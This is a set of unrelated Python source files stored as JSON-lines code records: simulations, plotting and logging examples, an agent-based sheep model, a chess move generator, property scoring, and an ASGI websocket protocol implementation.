f.write(data)\n\n    except ClientConnectionError:\n        return (rand_url, 404)\n    return file_name\n\n\nasync def fetch_all_rillas(wallet, rillas):\n    if not os.path.exists(wallet):\n        os.mkdir(wallet)\n    async with ClientSession() as session:\n        tasks = []\n        for rilla in rillas:\n            tasks.append(\n                fetch_rilla(wallet, rilla, session)\n            )\n        results = await asyncio.gather(*tasks)\n\n    images = []\n    for file_name in results:\n        images.append(imageio.imread(file_name))\n
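    # asyncio.gather() yields results in the order the tasks were submitted,
    # so GIF frame order follows iteration over the `rillas` set -- which is
    # arbitrary for a Python set, not sorted by asset id.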
    imageio.mimsave(f'{wallet}.gif', images, duration=.5)\n\nasyncio.run(fetch_all_rillas(wallet, rillas))\nprint(time.time() - start)\n","repo_name":"truunfederalagent/rilla-gifs","sub_path":"rilla_grabber.py","file_name":"rilla_grabber.py","file_ext":"py","file_size_in_byte":2419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"18140546927","text":"import random\n\ndef enqueueJob(jobs, job):\n    i = 0\n    while i < len(jobs) and jobs[i][0] < job[0]:\n        i += 1\n    # i is the first position whose timestamp is >= the job's; inserting\n    # there keeps the queue sorted by event time\n    jobs.insert(i, job)\n\n\ndef EventSimulation(distribution, jobProcessor, jobsAmount=0, returnPercentage=0):\n    processedJobs = 0\n    currentQueueLen = 0\n    maxQueueLen = 0\n\n    jobs = [[distribution.GetRandomValue(), 'g']]\n\n    free, isProcessed = True, False\n\n    generatedJobs = 0\n    returnedJobs = 0\n\n    while processedJobs < jobsAmount + returnedJobs:\n\n        job = jobs.pop(0)\n\n        if job[1] == 'g' and generatedJobs <= jobsAmount:\n\n            currentQueueLen += 1\n            generatedJobs += 1\n\n            if currentQueueLen > maxQueueLen:\n                maxQueueLen = currentQueueLen\n\n            enqueueJob(jobs, [job[0] + distribution.GetRandomValue(), 'g'])\n\n            if free:\n                isProcessed = True\n\n        elif job[1] == 'p':\n\n            processedJobs += 1\n\n            if random.randint(1, 100) <= returnPercentage:\n                returnedJobs += 1\n                currentQueueLen += 1\n\n            isProcessed = True\n\n        if isProcessed:\n\n            if currentQueueLen > 0:\n                currentQueueLen -= 1\n                t = jobProcessor.GetRandomValue()\n                enqueueJob(jobs, [job[0] + t, 'p'])\n                free = False\n            else:\n                free = True\n            isProcessed = False\n\n    return maxQueueLen, processedJobs, returnedJobs\n\n\ndef TimekeepingSimulation(distribution, jobProcessor, jobsAmount=0, returnPercentage=0, step=0.001):\n    processedJobs = 0\n\n    currentTime = step\n    generationTime = distribution.GetRandomValue()\n    processTime = 0\n\n    currentQueueLen = maxQueueLen = 0\n    generatedJobs = 0\n    returnedJobs = 0\n\n    while processedJobs < jobsAmount + returnedJobs:\n        \n        if currentTime > generationTime and generatedJobs <= jobsAmount:\n            currentQueueLen += 1\n            generatedJobs += 1\n            if currentQueueLen > maxQueueLen:\n                maxQueueLen = currentQueueLen\n            generationTime += distribution.GetRandomValue()\n\n        if currentTime > processTime:\n            if currentQueueLen > 0:\n                processedJobs += 1\n\n                if random.randint(1, 100) <= returnPercentage:\n                    returnedJobs += 1\n                    currentQueueLen += 1\n\n                currentQueueLen -= 1\n                processTime += jobProcessor.GetRandomValue()\n        currentTime += step\n\n    return maxQueueLen, processedJobs, returnedJobs","repo_name":"honeycarbs/bmstu-modeling-7sem","sub_path":"lab-04/code/queueing/simulation.py","file_name":"simulation.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"10252154031","text":"from turtle import * \n\nmau = ['red','blue','brown','yellow','grey']\n\nfor hinh in range (5):\n    color(mau[hinh])\n    begin_fill()\n    # draw a rectangle\n    for i in range (2): \n        for cn in range (1,3): \n            forward(50*cn)\n            right(90)\n    end_fill()\n    forward(50)\nmainloop()","repo_name":"quocthai200x/NguyenXuanQuocThai-Fundamentals-C4E27","sub_path":"session 3/HW3/hinh2.py","file_name":"hinh2.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
+{"seq_id":"71498072872","text":"import logging\n\n# logging.basicConfig(\n#     level= logging.DEBUG ,\n#     format='%(asctime)s - %(name)s - %(levelname)s - %(message)s' ,\n#     datefmt='%m/%d/%Y %H:%M:%S'\n# )\n
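# Note: logging.basicConfig() configures the root logger only on its first
# effective call; later calls are no-ops unless force=True (Python 3.8+).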
\n# logging.debug(\"This is a debug message\")\n# logging.info(\"This is an info message\")\n# logging.warning(\"This is a warning message\")\n# logging.error(\"This is an error message\")\n# logging.critical(\"This is a critical message\")\n\n# # define log handlers\n# logger = logging.getLogger(__name__)\n\n# stream_h = logging.StreamHandler()\n# file_h = logging.FileHandler('file.log')\n\n# # level & format for each handler\n# stream_h.setLevel(level=logging.WARNING)\n# file_h.setLevel(level=logging.ERROR)\n\n# formatter = logging.Formatter( '%(name)s - %(levelname)s - %(message)s' )\n# stream_h.setFormatter(formatter)\n# file_h.setFormatter(formatter)\n\n# # add handlers to the logger\n# logger.addHandler(stream_h)\n# logger.addHandler(file_h)\n\n# # log\n# logger.warning(\"This is a warning\")\n# logger.error(\"This is an error\")\n\n#-------------------- loading from config ----------------------------\n\n# import logging.config\n\n# logging.config.fileConfig('logging.conf')\n\n# logger = logging.getLogger('simpleExample')\n# logger.debug(\"This is a debug message\")\n\n\n#------------------- error logging --------------------------------\n# import traceback\n\n# try :\n#     a = [1,2,3]\n#     val = a[4]\n# except :\n#     logging.error( \"The error is %s\" , traceback.format_exc() )\n\n\n# --------------------- rotating handlers (for big applications, keep only the latest logs)-------------------------\nfrom logging.handlers import RotatingFileHandler , TimedRotatingFileHandler\n\nlogger = logging.getLogger(__name__)\nlogger.setLevel(logging.INFO)\n\n\n# roll over after 2KB and keep backup logs app.log , app.log2\nhandler = RotatingFileHandler( 'app.log' , maxBytes=2000 , backupCount=5 )\n\n# roll over at a preset time: s, m, h, d, midnight \nhandler_time = TimedRotatingFileHandler( 'timed_test.log', \n                                        when='s', \n                                        interval=5 , \n                                        backupCount=5 )\n\nlogger.addHandler(handler)\n\nfor _ in range(1000):\n    logger.info('hello, world!')\n\n\n\n\n\n\n\n","repo_name":"himasha0421/Advance-Python-World","sub_path":"logging_styles/logging_func.py","file_name":"logging_func.py","file_ext":"py","file_size_in_byte":2189,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"9543602741","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Jan 31 16:13:15 2022\n\n@author: Elliot\n\nThis exercise uses Object Oriented Programming to create an Agent Based Model \n(A model showing sheep's interaction with an environment)\n\nSteps \n\n1. Import Libraries and files being worked with. (Line 29 - 38) \nThe agentframe and environ files are integral parts of this \nmodel which allow it to run. Importing them here allows the Model to read in code from these files. \n\nThe matplotlib library allows us to visualise the model (Line 147 - 160)\n\n2. Create Agents and Wolf - See Agentframework.py \n\n3. Function to find distance between agents.\nFor the function distance_between, the program goes through rows x and y and calculates \nthe distance using Pythagoras' theorem.\n\n4. Create Environment. - See environ.py \n\n5. 
Run Agent_Based_Model \n\"\"\"\n# Imports Libraries \nimport matplotlib\nmatplotlib.use('TkAgg') #TkAgg renders data to a tk Canvas\nimport tkinter \nimport matplotlib.pyplot\nimport agentframework\nimport environ\nimport matplotlib.animation\nimport random\nimport requests\nimport bs4\n\n\n#Defining Variables \nnum_of_iterations = 500 # Number of times model runs \nnum_of_agents = 20 # Agents in model \nneighbourhood = 10 \nagents= [] # Creates List of Agents.\nwolves=[] # Creates List of wolves.\n\n\n\"\"\"\nWeb Scraping \n\nData from the URL below is drawn into this model.\nThis data is assigned to x and y values determining the initial starting position of each Agent. \n\"\"\"\n\nr = requests.get('http://www.geog.leeds.ac.uk/courses/computing/practicals/python/agent-framework/part9/data.html')\ncontent = r.text\nsoup = bs4.BeautifulSoup(content, 'html.parser')\ntd_ys = soup.find_all(attrs={\"class\" : \"y\"})\ntd_xs = soup.find_all(attrs={\"class\" : \"x\"})\n\n\"\"\"Web scraping test\"\"\"\nprint(td_ys, td_xs) \n\n\n#Reads in environment\nenvironment = environ.readEnvironment()\n\n\n\"\"\"Environment Test\"\"\" \n#a = agentframework.Agent(environment)\n#print(a._y, a._x)\n\n\n#Define parameters of Canvas\nfig = matplotlib.pyplot.figure(figsize=(7, 7))\nax = fig.add_axes([0, 0, 1, 1])\n\n\n\"\"\" \nAgents are created and enabled to interact with their environment.\nThe loop goes through the number of agents, determines each agent's starting position and creates it by drawing attributes \nfrom agentframework. It then appends each agent to the list of agents.\n\n\"\"\" \nfor i in range (num_of_agents): #Creates a loop going through number of agents \n    y = int(td_ys[i].text)\n    x = int(td_xs[i].text)\n    \n#Creates the agent instance while attaching the elements environment and agents.\n    sheep = agentframework.Agent(i,environment, agents, x, y)\n    agents.append(sheep) \n    \n\"\"\" \nOutside the loop we create a wolf, which goes through the same motion of drawing out its attributes from the framework. \n\n\"\"\" \n    \nwolve= agentframework.Agent(num_of_agents, environment, agents, x, y)\nwolves.append(wolve)\n\n\ndef update(frame_number):\n\n    \"\"\"Once the canvas is drawn, this updates it for each frame. \n    \n    If the argument frame_number isn't passed, the frame is not updated.\n    \n    Parameters\n    ----------\n    frame_number : int,\n        Number of frames after which the canvas is cleared and redrawn \n    ------\n    \"\"\"\n    fig.clear() \n    global carry_on\n    \n\n#Agentframework Tasks \n    random.shuffle(agents) # Agent order is randomized \n    \n#Loops through list of agents and calls agent methods defined in agentframework. This gives agency to created agents \n    for i in range (num_of_agents):\n        #print (agents[i].i)\n        \n        agent = agents[i]\n#This if statement is a condition which states if agents are alive, show them on screen. If they die, take them off screen.\n        if agent.living:\n            agent.move()\n            agent.eat()\n            agent.shared_neigbourhood(neighbourhood)\n#Wolves are outside the if statement because they are alive and doing the killing\n    wolves[0].move()\n    wolves[0].eatsheep(neighbourhood)\n    \n#Stopping condition: each frame there is a 10% chance of setting carry_on to False. 
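\n#With a 10% chance per frame, carry_on is set False on roughly one frame in ten; over\n#a 50-frame animation that happens at least once with probability ~99.5%.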
\n        if random.random() < 0.1:\n            carry_on = False\n            #print(\"stopping condition\")\n        else:\n            carry_on = True\n            #print(\"Continuing\")\n\n\n#Displays Environment \n    matplotlib.pyplot.ylim(0,250) \n    matplotlib.pyplot.xlim(0,250)\n    matplotlib.pyplot.imshow(environment)\n    matplotlib.pyplot.xlabel('Sheep are white, Wolf is brown')\n    matplotlib.pyplot.title(label=\"Sheep in trouble, Wolf on the loose\",\n          loc=\"center\",\n          fontstyle='italic')\n    \n    \n#Displays agents on Environment\n    for i in range (num_of_agents):\n        if agents[i].living:\n            matplotlib.pyplot.scatter(agents[i]._y,agents[i]._x,c=\"white\") # y and x points (Sheep) plots on map, colour white\n    matplotlib.pyplot.scatter(wolves[0]._y,wolves[0]._x,c=\"brown\") # y and x points plot on map (wolf), colour brown\n\n\nmatplotlib.pyplot.show()\n\n\"\"\"\nCreates the Graphical User Interface. The run and quit functions are commands which allow the model to be run and stopped from the GUI.\ntkinter.Menu creates the menu bar, with model_menu.add_command creating the buttons that execute the functions defined above.\n\"\"\"\n\ndef run(): \n    \n    \"\"\"This runs the simulation. \n    \n    Parameters\n    ----------\n    Does not take any parameters.\n    ------\n    \"\"\"\n    animation = matplotlib.animation.FuncAnimation(fig, update, interval=1, repeat=False, frames=50)\n    canvas.draw()\n\ndef quit():\n    \n    \"\"\"This stops the simulation.\n    \n    Parameters\n    ----------\n    Does not take any parameters. \n    ------\n    \"\"\"\n    global root\n    root.quit()\n\n'''Creates GUI'''\n\nroot = tkinter.Tk() \nroot.wm_title(\"Model\")\ncanvas = matplotlib.backends.backend_tkagg.FigureCanvasTkAgg(fig, master=root,)\ncanvas._tkcanvas.pack(side=tkinter.TOP, fill=tkinter.BOTH, expand=1)\n \nmenu_bar = tkinter.Menu(root)\nroot.config(menu=menu_bar)\nmodel_menu = tkinter.Menu(menu_bar)\nmenu_bar.add_cascade(label=\"Model\", menu=model_menu)\nmodel_menu.add_command(label=\"Run model\", command=run, state=\"normal\") \nmodel_menu.add_command(label=\"Clear model\", command=quit, state=\"normal\")\n\n\ntkinter.mainloop()\n\n\n\n \n","repo_name":"elliotkarikari/MSc-Submission-ABM","sub_path":"GIS Workbook/Model_Based_Agents.py","file_name":"Model_Based_Agents.py","file_ext":"py","file_size_in_byte":6181,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3301767175","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport torch\nfrom gym_chess_env import ChessBoard_gym\nfrom agent_chess_pytorch import DQN\nimport numpy as np\nimport math\nimport chess\n\n\n\n\n# In[2]:\nclass Gen_Legal_move:\n    def __init__(self, model_weights=\"checkpoint.pth-4rook_best-adamw.tar\"):\n        super(Gen_Legal_move, self).__init__()\n        self.device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n        model = DQN(8,8,112).to(self.device)\n        self.model = self.load_from_saved_model(model, model_weights)\n\n    @staticmethod\n    def load_from_saved_model(model, path = \"checkpoint.pth.tar\"):\n        checkpoint = torch.load(path)\n        model.load_state_dict(checkpoint['state_dict'])\n        return model\n\n    def generate_legal_moves(self, board, num_moves):\n        # create the environment before sampling its initial state\n        env = ChessBoard_gym()\n        state = torch.from_numpy(env.reset()).float()\n        env.set_board(board)\n        starting_pos_FEN = env.get_FEN()\n\n        observation_space = 64\n        state_model_input = torch.reshape(state, [1, observation_space])\n        \n        action_id = self.model(state_model_input).argmax(1)[0].detach()\n        legal_move_ids = []\n        for i in range(0,num_moves):\n            next_state,reward, _, _ = env.step(action_id)\n            next_state_model_input = torch.from_numpy(next_state).float()\n            next_state_model_input = torch.reshape(next_state_model_input, [1, observation_space])\n            action_id = self.model(next_state_model_input).argmax(1)[0].detach()\n            legal_move_ids.append(action_id)\n\n        return legal_move_ids\n\n","repo_name":"pnarsina/w251_chess_objectid_n_rl","sub_path":"rl_model_generate_legalMoves.py","file_name":"rl_model_generate_legalMoves.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"35331433090","text":"from PygameManager import PygameManager\nfrom QueueStepper import QueueStepper\nimport pygame\n\npygameManager = PygameManager(pygame)\npygameManager.setup()\n\nqueueStepper = QueueStepper(\"Chapters.json\", pygame)\n\nprogrammAktiv = True\n\nwhile (programmAktiv and not queueStepper.isEndReached()):\n    for event in pygame.event.get():\n        if event.type == pygame.KEYUP:\n            if event.key == pygame.K_q:\n                programmAktiv = False\n            if event.key == pygame.K_a:\n                queueStepper.nextStep()\n    pygameManager.clockTick()\npygameManager.teardown()","repo_name":"Sosian/VoiceControlBachelorThesis","sub_path":"VoiceControl.py","file_name":"VoiceControl.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5165439530","text":"import os\nimport pandas as pd\nimport numpy as np\nimport geopandas as gpd\nimport matplotlib.pyplot as plt\nimport plotly.express as px\n\nfrom inspect import getsourcefile\nfrom os.path import abspath\n\nfrom transit_score import transit_score\n\n#set active directory to file location\ndirectory = abspath(getsourcefile(lambda:0))\n#check if system uses forward or backslashes for writing directories\nif(directory.rfind(\"/\") != -1):\n    newDirectory = directory[:(directory.rfind(\"/\")+1)]\nelse:\n    newDirectory = directory[:(directory.rfind(\"\\\\\")+1)]\nos.chdir(newDirectory)\n\ndef create_property_scores():\n    #list of geodataframes - each one is a different amenity\n    amenities = []\n    \n    #import amenities: bus stops, grocery stores, hospitals, etc. 
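\n    #each CSV is expected to provide Latitude/Longitude columns; its file name\n    #(minus .csv) becomes the amenity category flagged on every property below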
\n #list of files in 'amenity data'\n amenity_files = os.listdir('amenity data')\n for file in amenity_files:\n df = pd.read_csv('amenity data/'+file)\n #convert to gdf using Latitude\tLongitude\n gdf = gpd.GeoDataFrame(df, geometry=gpd.points_from_xy(df.Longitude, df.Latitude))\n gdf['category'] = file[:-4]\n #wgs84 is the standard lat/long coordinate system\n gdf.crs = 'epsg:4326'\n #convert to NAD UTM 10N\n gdf = gdf.to_crs('epsg:26910')\n amenities.append(gdf)\n\n properties = gpd.read_file(\"CRD Properties/core muni properties dissolved.geojson\")\n #drop all columns except geometry and AddressCombined\n properties = properties[['geometry', 'AddressCombined']]\n\n properties = properties.to_crs('epsg:26910')\n\n #check for invalid geometries\n properties = properties[properties.is_valid]\n\n #calculate transit score\n print(\"Calculating transit score...\")\n properties = transit_score(properties)\n\n #reset index\n properties = properties.reset_index()\n \n for amenity in amenities:\n category = amenity['category'][0]\n properties[category] = 0\n\n buffer = gpd.GeoDataFrame(geometry=amenity.buffer(800,resolution=1))\n\n # Perform a spatial join operation between the two datasets\n properties_within_buffer = gpd.sjoin(properties, buffer, predicate='intersects')\n\n # Create a new column called category and assign a value of 1 to all rows\n properties_within_buffer[category] = 1\n\n # Update the 'amenity' column in the original properties dataset for the properties within the buffer\n properties.loc[properties_within_buffer.index, category] = 1\n\n print(\"Analyzed {}. {} amenities in dataset, {} properties within 800m buffer.\".format(category, len(amenity), len(properties_within_buffer))) \n\n properties = properties.to_crs('epsg:4326') \n\n #MERGE WITH HFL ZONING DATA\n\n #import zoning data\n zoning = gpd.read_file('zoning/Harmonized_Zones.shp')\n zoning = zoning[['SIMPLIFIED', 'geometry']]\n zoning = zoning.to_crs('epsg:4326')\n zoning = zoning.rename(columns={'SIMPLIFIED': 'Current Zoning'})\n\n #perform spatial join. Find zoning for each property, create 'zone' column in properties with zoning.\n #zoning has a 'SIMPLIFIED' column. This is the zoning type.\n print(len(properties))\n\n original_geometry = properties.geometry\n \n #Zoning maps being aligned with the edge of properties is causing multiple zones to be assigned to each property.\n #Scaling properties down by 70% to fix most of this. Doesn't always work.\n\n properties.geometry = properties.geometry.scale(xfact=0.7, yfact=0.7, zfact=0.7, origin=\"centroid\")\n properties = gpd.sjoin(properties, zoning, how='left', predicate='intersects')\n properties.geometry = original_geometry\n\n #if there's multiple rows with the same geometry/Address, go with the first one. 
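Parcels that sit exactly on a zoning boundary can still intersect two polygons even after the shrink, which is where most duplicates come from. 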
There's a few edge cases where this happens and it's on my list of things to investigate.\n properties = properties.drop_duplicates(subset=['geometry'], keep='first')\n properties = properties.drop_duplicates(subset=['AddressCombined'], keep='first')\n\n print(len(properties))\n properties = properties.reset_index(drop=True)\n properties = properties.drop(columns=['index_right'])\n\n properties.to_file(\"CRD Properties/scored_properties.geojson\", driver='GeoJSON')\n\n return\n\ndef aggregate_amenities(properties):\n \n #import weights\n weights = pd.read_csv('amenity weights.csv')\n\n properties['amenity_score'] = 0\n\n #for coloumns that aren't index, AddressCombined, transit_score, or geometry:\n #multiply by weight\n #add to amenity_score\n properties = properties.to_crs('epsg:4326')\n\n for col in properties.columns:\n if(col not in ['index', 'AddressCombined', 'transit_score', 'geometry','amenity_score', 'Current Zoning']):\n print(col)\n w = weights[weights['amenity'] == col]['weight'].values[0]\n properties[col] = properties[col].astype(int)\n properties['amenity_score'] = properties['amenity_score'] + w*properties[col]\n \n #normalize amenity score from 0 to 1\n properties['amenity_score'] = properties['amenity_score']/properties['amenity_score'].max()\n \n #transit_score is from 0 to 1. arbitrary weights\n properties['OCP Score'] = 0.5*properties['transit_score'] + 0.5*properties['amenity_score']\n\n properties = properties[['geometry', 'AddressCombined', 'amenity_score', 'transit_score', 'OCP Score', 'Current Zoning']]\n\n #multiply by 100 and then round to an integer using round()\n properties['amenity_score'] = round(100*properties['amenity_score'])\n properties['transit_score'] = round(100*properties['transit_score'])\n properties['OCP Score'] = round(100*properties['OCP Score'])\n\n return(properties)\n\n#call this function before running mapping\n\n#create_property_scores()","repo_name":"homesforliving/OCP-Reform","sub_path":"OCP_score_generation.py","file_name":"OCP_score_generation.py","file_ext":"py","file_size_in_byte":5698,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"698167110","text":"import typing\r\nimport asyncio\r\nimport logging\r\nimport enum\r\nimport time\r\n\r\n# wsproto\r\nimport wsproto\r\nimport wsproto.events\r\n\r\nfrom hatsu.types import Scope, Transport, Protocol\r\nfrom hatsu.utils import get_addr, get_scheme\r\n\r\nif typing.TYPE_CHECKING:\r\n from hatsu.core.server import Server\r\n\r\nfrom urllib.parse import unquote\r\n\r\nclass WebsocketState(enum.Enum):\r\n HANDSHAKE = 0\r\n CONNECTED = 1\r\n CLOSED = 2\r\n\r\nclass WSProtoImpl(Protocol):\r\n \"\"\"A ws implementation using `asyncio.Protocol`.\"\"\"\r\n\r\n def __init__(self, server: \"Server\") -> None:\r\n self.server = server\r\n\r\n # Logging.\r\n self.logger = logging.getLogger('hatsu.protocols.websocket_wsproto')\r\n\r\n # Asyncio.\r\n self.loop = asyncio.get_event_loop()\r\n\r\n # Connection state.\r\n self.transport = None\r\n self.peername = None\r\n self.sockname = None\r\n self.connection = wsproto.WSConnection(\r\n wsproto.ConnectionType.SERVER\r\n )\r\n self.queue = asyncio.Queue()\r\n self.handshake_complete = False\r\n\r\n # Send and recv state.\r\n self.start_end = False\r\n self.body_end = False\r\n self.send_close = False\r\n self.state = WebsocketState.HANDSHAKE\r\n\r\n # Ping control.\r\n self.last_ping = time.time()\r\n\r\n # Flow control.\r\n self.write_pause = False\r\n self.read_pause = False\r\n\r\n # 
Buffer.\r\n self.text = \"\"\r\n self.bytes = b\"\"\r\n\r\n def connection_made(self, transport: Transport) -> None:\r\n # When a connection is initialized\r\n # it save the `transport` to the class\r\n # so it can be used later.\r\n\r\n self.server.connections.add(self)\r\n\r\n self.transport = transport\r\n self.schme = get_scheme(self.transport, type=\"websocket\")\r\n self.peername = get_addr(self.transport, type=\"peername\")\r\n self.sockname = get_addr(self.transport, type=\"sockname\")\r\n\r\n self.logger.debug('Connection made.')\r\n\r\n def connection_lost(self, exc: typing.Optional[Exception]) -> None:\r\n # When a connection is closed\r\n # it updates the `request` state\r\n # to `disconnected.`\r\n\r\n self.server.connections.discard(self)\r\n self.logger.debug(\"Connection closed.\")\r\n\r\n if self.read_pause is True:\r\n self.read_pause = False\r\n self.transport.resume_reading()\r\n\r\n self.transport.close()\r\n\r\n def data_received(self, data: bytes) -> None:\r\n # Called when the packet is complete.\r\n\r\n if len(data) > self.server.ws_max_size:\r\n raise ValueError(\"Data is too big.\")\r\n\r\n self.connection.receive_data(data)\r\n\r\n def __request__(event: wsproto.events.Request):\r\n # Called when the request is complete\r\n # it also build the scope.\r\n\r\n self.handshake_complete = True\r\n\r\n headers = [\r\n (b\"host\", event.host.encode(\"utf-8\")),\r\n *event.extra_headers\r\n ]\r\n raw_path, _, query_string = event.target.partition(\"?\")\r\n self.scope: \"Scope\" = {\r\n \"type\": \"websocket\",\r\n \"asgi\": {\r\n \"version\": \"3\",\r\n \"spec_version\": \"2.3\"\r\n },\r\n \"http_version\": \"1.1\",\r\n \"scheme\": self.schme,\r\n \"path\": unquote(raw_path),\r\n \"query_string\": query_string,\r\n \"root_path\": self.server.root_path,\r\n \"headers\": headers,\r\n \"client\": self.peername,\r\n \"server\": self.sockname,\r\n \"subprotocls\": event.subprotocols\r\n }\r\n message = {\r\n \"type\": \"websocket.connect\"\r\n }\r\n self.queue.put_nowait(message)\r\n\r\n if self.server.limit_concurrency is not None:\r\n if len(self.server.connections) >= self.server.limit_concurrency \\\r\n or len(self.server.tasks) >= self.server.limit_concurrency:\r\n self.logger.warning(\"Exceeded concurrency limit.\")\r\n\r\n self.app = self.server.application\r\n\r\n task = self.loop.create_task(\r\n self.app(\r\n self.scope, self.asgi_recv, self.asgi_send\r\n )\r\n )\r\n task.add_done_callback(self.server.tasks.discard)\r\n self.server.tasks.add(task)\r\n\r\n def __byte_message__(event: wsproto.events.BytesMessage):\r\n # Called when the client sends a message.\r\n self.bytes += event.data\r\n\r\n if event.message_finished is True:\r\n message = {\r\n \"type\": \"websocket.receive\",\r\n \"bytes\": self.bytes\r\n }\r\n self.queue.put_nowait(message)\r\n self.bytes = b\"\"\r\n\r\n def __text_message__(event: wsproto.events.TextMessage):\r\n # Called when the client sends a message.\r\n self.text += event.data\r\n\r\n if event.message_finished is True:\r\n message = {\r\n \"type\": \"websocket.receive\",\r\n \"text\": self.text\r\n }\r\n self.queue.put_nowait(message)\r\n self.text = \"\"\r\n\r\n def __close__(event: wsproto.events.CloseConnection):\r\n # Called when the connection is about to close.\r\n\r\n message = {\r\n \"type\": \"websocket.disconnect\",\r\n \"code\": event.code\r\n }\r\n self.queue.put_nowait(message)\r\n self.transport.close()\r\n\r\n def __ping__(event: wsproto.events.Ping):\r\n # Called when the server recv ping.\r\n\r\n if time.time() - 
(self.last_ping - self.server.ws_ping_interval):\r\n return\r\n\r\n self.transport.write(\r\n self.conn.send(event.response())\r\n )\r\n\r\n def __close__(event: wsproto.events.CloseConnection):\r\n # Called when the server recv close.\r\n\r\n message = {\r\n \"type\": \"websocket.disconnect\",\r\n \"code\": event.code\r\n }\r\n self.queue.put_nowait(message)\r\n self.transport.close()\r\n\r\n handlers = {\r\n wsproto.events.Request: __request__,\r\n wsproto.events.TextMessage: __text_message__,\r\n wsproto.events.BytesMessage: __byte_message__,\r\n wsproto.events.Ping: __ping__,\r\n wsproto.events.CloseConnection: __close__,\r\n }\r\n\r\n for event in self.connection.events():\r\n event_type = type(event)\r\n handlers[event_type](event)\r\n\r\n async def asgi_send(self, message):\r\n # Send interface for the application.\r\n\r\n if self.state is WebsocketState.HANDSHAKE:\r\n if message[\"type\"] != \"websocket.accept\":\r\n # TODO: MAKE IT BETTER.\r\n raise ValueError(\"Can't send this message in that state.\")\r\n\r\n subprotocls = message.get(\"subprotocls\")\r\n event = wsproto.events.AcceptConnection(\r\n subprotocol=subprotocls\r\n )\r\n self.transport.write(\r\n self.connection.send(event=event)\r\n )\r\n self.start_end = True\r\n self.state = WebsocketState.CONNECTED\r\n\r\n self.logger.debug(\r\n f'Websocket handshake complete. ({self.peername})'\r\n )\r\n\r\n elif self.state is WebsocketState.CONNECTED:\r\n if message[\"type\"] not in (\"websocket.send\", \"websocket.close\"):\r\n # TODO: MAKE IT BETTER.\r\n raise ValueError(\"Can't send this message in that state.\")\r\n\r\n if message[\"type\"] == \"websocket.close\":\r\n code, reason = message.get(\"code\"), \\\r\n message.get(\"reason\", \"\")\r\n event = wsproto.events.CloseConnection(\r\n code=code, reason=reason\r\n )\r\n message = {\r\n \"type\": \"websocket.disconnect\",\r\n \"code\": code\r\n }\r\n\r\n self.queue.put_nowait(message)\r\n if self.transport.is_closing() is False:\r\n self.transport.write(\r\n self.connection.send(event=event)\r\n )\r\n self.transport.close()\r\n\r\n if self.transport.is_closing() is False:\r\n text = message.get('text', None)\r\n bytes = message.get('bytes', None)\r\n\r\n if text is not None:\r\n event = wsproto.events.TextMessage(\r\n data=text\r\n )\r\n elif bytes is not None:\r\n event = wsproto.events.BytesMessage(\r\n data=bytes\r\n )\r\n\r\n self.transport.write(\r\n self.connection.send(event=event)\r\n )\r\n\r\n async def asgi_recv(self):\r\n # Recv interface for the application.\r\n\r\n message = await self.queue.get()\r\n if self.read_pause is True and self.queue.empty():\r\n self.read_pause = False\r\n self.transport.resume_reading()\r\n return message\r\n\r\n def close_protocol(self):\r\n # To close the connection when clean up.\r\n\r\n if self.handshake_complete is True:\r\n message = {\"type\": \"websocket.disconnect\", \"code\": 1012}\r\n self.queue.put_nowait(message)\r\n\r\n event = wsproto.events.CloseConnection(code=1012)\r\n self.transport.write(\r\n self.connection.send(event=event)\r\n )\r\n else:\r\n headers = [\r\n (b\"content-type\", b\"text/plain; charset=utf-8\"),\r\n (b\"connection\", b\"close\"),\r\n ]\r\n output = self.connection.send(\r\n wsproto.events.RejectConnection(\r\n status_code=500, headers=headers, has_body=True\r\n )\r\n )\r\n output += self.connection.send(\r\n wsproto.events.RejectData(data=b\"Internal Server Error\")\r\n )\r\n self.transport.write(output)\r\n 
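# hand the rejection bytes to the transport before closing, so the client\r\n            # receives the 500 response body rather than a bare connection reset\r\n            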
self.transport.close()\r\n","repo_name":"ArtyTheDev/hatsu","sub_path":"hatsu/protocols/websocket_wsproto.py","file_name":"websocket_wsproto.py","file_ext":"py","file_size_in_byte":10294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9430313389","text":"\nfrom os import stat\nimport numpy as np\nimport pyro\nfrom pyro import poutine\nimport pyro.distributions as dist\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.distributions.constraints as constraints\nfrom tqdm import tqdm\nimport warnings\n\nfrom scipy.sparse import isspmatrix\nfrom kladi.matrix_models.scipm_base import BaseModel, get_fc_stack\nimport configparser\nimport requests\nimport json\nfrom itertools import zip_longest\nimport matplotlib.pyplot as plt\nimport logging\nfrom math import ceil\nfrom kladi.core.plot_utils import map_plot\nfrom functools import partial\nfrom kladi.matrix_models.scipm_base import Decoder\nfrom pyro.contrib.autoname import scope\n\nconfig = configparser.ConfigParser()\nconfig.read('kladi/matrix_models/config.ini')\n\nlogger = logging.getLogger(__name__)\n\ndef grouper(iterable, n, fillvalue=None):\n \"Collect data into fixed-length chunks or blocks\"\n # grouper('ABCDEFG', 3, 'x') --> ABC DEF Gxx\"\n args = [iter(iterable)] * n\n return zip_longest(*args, fillvalue=fillvalue)\n\ndef compact_string(x, max_wordlen = 4, join_spacer = ' ', sep = ' '):\n return '\\n'.join(\n [\n join_spacer.join([x for x in segment if not x == '']) for segment in grouper(x.split(sep), max_wordlen, fillvalue='')\n ]\n )\n\nclass 